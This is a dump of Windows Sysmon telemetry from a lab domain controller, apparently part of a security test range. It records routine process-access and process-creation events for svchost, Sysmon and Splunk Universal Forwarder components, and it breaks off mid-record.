10341000x80000000000000009063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46B4-6000-ED04-000000009A01}4316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B4-6000-ED04-000000009A01}4316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-46B4-6000-ED04-000000009A01}4316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.609{08A6967A-46B5-6000-EF04-000000009A01}14641360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B5-6000-EF04-000000009A01}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B5-6000-EF04-000000009A01}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.468{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B5-6000-EF04-000000009A01}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:17.469{08A6967A-46B5-6000-EF04-000000009A01}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.859{08A6967A-46B6-6000-F104-000000009A01}44241292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 